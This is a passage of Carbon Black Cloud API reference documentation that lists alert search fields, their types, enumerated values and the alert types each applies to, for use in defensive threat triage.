`mdr_determination_value`	Searchable A record that identifies the whether the alert was determined to represent a likely or unlikely threat.	String `NOT_ENOUGH_INFO` `NOT_REVIEWED` `NONE` `UNLIKELY_THREAT` `LIKELY_THREAT`	FACET
`mdr_threat_notes_present`	Searchable Customer visible notes at the threat level that were added by a MDR analyst	Boolean
`mdr_workflow`	MDR-updatable workflow of the alert	Nested Response Object: `{ "mdr_workflow": { "change_timestamp": "<string>", "status": "<string>", "is_assigned": "<boolean>" } }`
`mdr_workflow_change_timestamp`	Searchable Time Range Sortable When the last MDR status change occurred	ISO 8601 UTC Date String Note: When used as criteria the search is within the period specified by `time_range` on that request and uses the Time Range Object
`mdr_workflow_is_assigned`	Searchable	Boolean
`mdr_workflow_status`	Searchable Array Primary value used to capture status change during MD Analyst’s alert triage	String `UNCLAIMED` `IN_PROGRESS` `TRIAGE_COMPLETE` `ACTION_REQUESTED` `PENDING_RESPONSE` `RESPONCE_RECEIVED`	FACET
`minimum_severity`	Searchable Integer representation of severity of an Alert. Use in search criteria to limit the alerts returned to those with a severity higher than this value	Integer	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
`ml_classification_anomalies`	List of anomalies associated with this Alert. `anomalous_field` The specific field that is exhibiting anomalous behavior; it helps identify the exact area where the anomaly has occurred. String `anomalous_field_baseline_values` - The normal or expected values for the data field; this helps quantify the anomaly’s significance. [ String ] `anomaly_name` The anomaly’s name. String `anomalous_value` The actual value that was identified as an anomaly; this value contrasts with the baseline values. String	Nested Response Object: `"ml_classification_anomalies": [ { "anomalous_field": "actor_process_modload_count", "anomalous_field_baseline_values": [ "0", "1" ], "anomaly_name": "Process modloads", "anomalous_value": "65" }, { "anomalous_field": "actor_process_filemod_count", "anomalous_field_baseline_values": [ "0" ], "anomaly_name": "Process filemods", "anomalous_value": "8" } ]`	WATCHLIST
`ml_classification_final_verdict`	Searchable Array Final verdict of the alert, based on the ML models that were used to make the prediction.	String `NOT_CLASSIFIED` `NOT_ANOMALOUS` `ANOMALOUS`	WATCHLIST FACET
`ml_classification_global_prevalence`	Searchable Array Categories (low/medium/high) used to describe the prevalence of alerts across all regional organizations.	String `UNKNOWN` `LOW` `MEDIUM` `HIGH`	WATCHLIST
`ml_classification_org_prevalence`	Searchable Array Categories (low/medium/high) used to describe the prevalence of alerts within an organization.	String `UNKNOWN` `LOW` `MEDIUM` `HIGH`	WATCHLIST
`netconn_local_ip`	Searchable Array IP address of the remote side of the network connection; stored as dotted decimal	String	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM
`netconn_local_ipv4`	Searchable Array IPv4 address of the local side of the network connection; stored as a dotted decimal. Only one of ipv4 and ipv6 fields will be populated.	String	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM
`netconn_local_ipv6`	Searchable Array IPv6 address of the local side of the network connection; stored as a string without octet-separating colon characters. Only one of ipv4 and ipv6 fields will be populated.	String	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM
`netconn_local_port`	Searchable Array TCP or UDP port used by the local side of the network connection	Integer	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM
`netconn_protocol`	Searchable Array Network protocol of the network connection	String	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM
`netconn_remote_domain`	Searchable Array Domain name (FQDN) associated with the remote end of the network connection, if available	String	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM
`netconn_remote_ip`	Searchable Array IP address of the local side of the network connection; stored as dotted decimal	String	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM
`netconn_remote_ipv4`	Searchable Array IPv4 address of the remote side of the network connection; stored as dotted decimal. Only one of ipv4 and ipv6 fields will be populated.	String	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM
`netconn_remote_ipv6`	Searchable Array IPv6 address of the remote side of the network connection; stored as a string without octet-separating colon characters. Only one of ipv4 and ipv6 fields will be populated.	String	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM
`netconn_remote_port`	Searchable Array TCP or UDP port used by the remote side of the network connection; same as netconn_port and event_network_remote_port	Integer	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM
`org_key`	Unique alphanumeric string that identifies your organization in the Carbon Black Cloud	String	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
`parent_cmdline`	Searchable Array Command line of the parent process	String	CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
`parent_effective_reputation`	Searchable Array Effective reputation of the parent process; applied by the sensor when the event occurred	String `ADAPTIVE_WHITE_LIST` `COMMON_WHITE_LIST` `COMPANY_BLACK_LIST` `COMPANY_WHITE_LIST` `PUP` `TRUSTED_WHITE_LIST` `RESOLVING` `COMPROMISED_OBSOLETE` `DLP_OBSOLETE` `IGNORE` `ADWARE` `HEURISTIC` `SUSPECT_MALWARE` `KNOWN_MALWARE` `ADMIN_RESTRICT_OBSOLETE` `NOT_LISTED` `GRAY_OBSOLETE` `NOT_COMPANY_WHITE_OBSOLETE` `LOCAL_WHITE` `NOT_SUPPORTED`	CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
`parent_guid`	Searchable Array Unique process identifier assigned to the parent process	String	CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
`parent_md5`	Searchable Array MD5 hash of the parent process binary	String	CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
`parent_name`	Searchable Array Filesystem path of the parent process binary	String	CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
`parent_pid`	Searchable Array Identifier assigned by the operating system to the parent process	Integer
`parent_reputation`	Searchable Array Reputation of the parent process; applied by the Carbon Black Cloud when the event is initially processed	String `ADAPTIVE_WHITE_LIST` `COMMON_WHITE_LIST` `COMPANY_BLACK_LIST` `COMPANY_WHITE_LIST` `PUP` `TRUSTED_WHITE_LIST` `RESOLVING` `COMPROMISED_OBSOLETE` `DLP_OBSOLETE` `IGNORE` `ADWARE` `HEURISTIC` `SUSPECT_MALWARE` `KNOWN_MALWARE` `ADMIN_RESTRICT_OBSOLETE` `NOT_LISTED` `GRAY_OBSOLETE` `NOT_COMPANY_WHITE_OBSOLETE` `LOCAL_WHITE` `NOT_SUPPORTED`	CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
`parent_sha256`	Searchable Array SHA-256 hash of the parent process binary	String	CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
`parent_username`	Searchable Array User context in which the parent process was executed	String	CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
`policy_applied`	Searchable Array Indicates whether or not a policy has been applied to any event associated with this alert	String `APPLIED` `NOT_APPLIED`	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
`primary_event_id`	Searchable Array ID of the primary event in the alert	String	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
`process_cmdline`	Searchable Array Command line executed by the actor process	String	CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
`process_effective_reputation`	Searchable Array Effective reputation of the actor hash	String `ADAPTIVE_WHITE_LIST` `COMMON_WHITE_LIST` `COMPANY_BLACK_LIST` `COMPANY_WHITE_LIST` `PUP` `TRUSTED_WHITE_LIST` `RESOLVING` `COMPROMISED_OBSOLETE` `DLP_OBSOLETE` `IGNORE` `ADWARE` `HEURISTIC` `SUSPECT_MALWARE` `KNOWN_MALWARE` `ADMIN_RESTRICT_OBSOLETE` `NOT_LISTED` `GRAY_OBSOLETE` `NOT_COMPANY_WHITE_OBSOLETE` `LOCAL_WHITE` `NOT_SUPPORTED`	CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
`process_guid`	Searchable Array Guid of the process that has fired the alert (optional)	String	CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
`process_issuer`	Searchable Array	String	CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
`process_md5`	Searchable Array MD5 hash of the actor process binary	String	CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
`process_name`	Searchable Array Process names of an alert	String	CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
`process_pid`	Searchable Array PID of the process that has fired the alert (optional)	Integer
`process_publisher`	Searchable Array	String	CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
`process_reputation`	Searchable Array Reputation of the actor process; applied when event is processed by the Carbon Black Cloud	String `ADAPTIVE_WHITE_LIST` `COMMON_WHITE_LIST` `COMPANY_BLACK_LIST` `COMPANY_WHITE_LIST` `PUP` `TRUSTED_WHITE_LIST` `RESOLVING` `COMPROMISED_OBSOLETE` `DLP_OBSOLETE` `IGNORE` `ADWARE` `HEURISTIC` `SUSPECT_MALWARE` `KNOWN_MALWARE` `ADMIN_RESTRICT_OBSOLETE` `NOT_LISTED` `GRAY_OBSOLETE` `NOT_COMPANY_WHITE_OBSOLETE` `LOCAL_WHITE` `NOT_SUPPORTED`	CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
`process_sha256`	Searchable Array SHA-256 hash of the actor process binary	String	CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
`process_username`	Searchable Array User context in which the actor process was executed. MacOS - all users for the PID for fork() and exec() transitions. Linux - process user for exec() events, but in a future sensor release can be multi-valued due to setuid().	String	CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
`product_id`	Searchable Array IDs of the product that identifies USB devices	String	DEVICE_CONTROL
`product_name`	Searchable Array Names of the product that identifies USB devices	String	DEVICE_CONTROL FACET
`reason`	A spoken language written explanation of the what and why the alert occurred and any action taken, usually consisting of 1 to 3 sentences.	String	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
`reason_code`	Searchable Array A unique short-hand code or GUID identifying the particular alert reason	String	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
`remote_is_private`	Searchable Is the remote information private: true or false	Boolean	CONTAINER_RUNTIME
`remote_k8s_kind`	Searchable Array Kind of remote workload; set if the remote side is another workload in the same cluster	String	CONTAINER_RUNTIME
`remote_k8s_namespace`	Searchable Array Namespace within the remote workload’s cluster; set if the remote side is another workload in the same cluster	String	CONTAINER_RUNTIME
`remote_k8s_pod_name`	Searchable Array Remote workload pod name; set if the remote side is another workload in the same cluster	String	CONTAINER_RUNTIME
`remote_k8s_workload_name`	Searchable Array Name of the remote workload; set if the remote side is another workload in the same cluster	String	CONTAINER_RUNTIME
`report_description`	Description of the watchlist report associated with the alert	String	WATCHLIST
`report_id`	Searchable Array Report IDs that contained the IOC that caused a hit	String	WATCHLIST
`report_link`	Searchable Array Link of reports that contained the IOC that caused a hit	String	WATCHLIST
`report_name`	Searchable Array Name of the watchlist report	String	WATCHLIST FACET
`report_tags`	Tags associated with the watchlist report	String[]	WATCHLIST
`rule_category_id`	Searchable Array ID representing the category of the rule_id for certain alert types	String	CB_ANALYTICS HOST_BASED_FIREWALL INTRUSION_DETECTION_SYSTEM FACET
`rule_config_category`	Searchable Array Types of rule configs	String	reserved for future use
`rule_id`	Searchable Array ID of the rule that triggered an alert; applies to Intrusion Detection System, Host-Based Firewall, TAU Intelligence, and USB Device Control alerts	String	CB_ANALYTICS HOST_BASED_FIREWALL INTRUSION_DETECTION_SYSTEM FACET
`run_state`	Searchable Array Whether the threat in the alert actually ran	String `DID_NOT_RUN` `RAN` `UNKNOWN`	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
`sensor_action`	Searchable Array Actions taken by the sensor, according to the rules of a policy	String `ALLOW` `ALLOW_AND_LOG` `DENY` `TERMINATE`	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
`serial_number`	Searchable Array Serial numbers of the specific devices	String	DEVICE_CONTROL
`severity`	Searchable - use `minimum_severity` Sortable Integer representation of the impact of alert if true positive	Integer	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
`tags`	Searchable Array Tags added to the threat ID of the alert	String	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
`threat_hunt_id`	Searchable ID of the threat hunt being conducted in your environment by Carbon Black MDR	String	WATCHLIST
`threat_hunt_name`	Searchable Name of the threat hunt being conducted in your environment by Carbon Black MDR. The status of a threat hunt can either being ongoing or completed	String	WATCHLIST FACET
`threat_id`	Searchable Array ID assigned to a group of alerts with common criteria, based on alert type	String	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
`threat_name`	Searchable Array Name of the threat	String	INTRUSION_DETECTION_SYSTEM
`threat_notes_present`	Searchable True if notes are present on the threat ID. False if notes are not present.	Boolean	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
`tms_rule_id`	Searchable Array Detection id	String	INTRUSION_DETECTION_SYSTEM
`ttps`	Searchable Array Other potential malicious activities involved in a threat	String	CB_ANALYTICS WATCHLIST INTRUSION_DETECTION_SYSTEM
`type`	Searchable Array Type of alert generated	String `CB_ANALYTICS` `WATCHLIST` `DEVICE_CONTROL` `CONTAINER_RUNTIME` `HOST_BASED_FIREWALL` `INTRUSION_DETECTION_SYSTEM` `NETWORK_TRAFFIC_ANALYSIS`	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
`user_update_timestamp`	Searchable Time Range Sortable Timestamp of the last property of an alert changed by a user, such as the alert workflow or determination	ISO 8601 UTC Date String Note: When used as criteria the search is within the period specified by `time_range` on that request and uses the Time Range Object	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
`vendor_id`	Searchable Array IDs of the vendors who produced the devices	String	DEVICE_CONTROL
`vendor_name`	Searchable Array Names of the vendors who produced the devices	String	DEVICE_CONTROL FACET
`watchlists`	List of watchlists associated with an alert. Alerts are batched hourly	Nested Response Object: `{ "watchlists": [ { "id": "", "name": "" } ] }`	WATCHLIST
`watchlists_id`	Searchable Array	String	WATCHLIST
`watchlists_name`	Searchable Array	String	WATCHLIST FACET
`workflow`	Current workflow state of an alert. The workflow represents the flow from `OPEN` to `IN_PROGRESS` to `CLOSED` and captures who moved the alert into the current state. The history of these state transitions is available via the alert history route.	Nested Response Object: `{ "workflow": { "change_timestamp": "<string>", "changed_by": "<string>", "changed_by_type": "<string>", "changed_by_autoclose_rule_id": "<string>", "closure_reason": "<string>", "status": "<string>" } }`	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
`workflow_change_timestamp`	Searchable Time Range Sortable When the last status change occurred	ISO 8601 UTC Date String Note: When used as criteria the search is within the period specified by `time_range` on that request and uses the Time Range Object	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
`workflow_changed_by`	Who (or what) made the last status change	String	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
`workflow_changed_by_type`	Searchable Array	String `SYSTEM` `USER` `API` `AUTOMATION`	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
`workflow_closure_reason`	Searchable Array A more detailed description of why the alert was resolved	String `NO_REASON` `RESOLVED` `RESOLVED_BENIGN_KNOWN_GOOD` `DUPLICATE_CLEANUP` `OTHER`	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
`workflow_status`	Searchable Array primary value used to determine if the alert is active or inactive and displayed in the UI by default	String `OPEN` `IN_PROGRESS` `CLOSED`	CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET

Limitations

As with standard AND queries when searching for field_1 = X and field_2 = Y, an event with only one field populated will not be returned.

Give Feedback

New survey coming soon!

Last modified on March 13, 2024

Carbon Black Cloud

Page Contents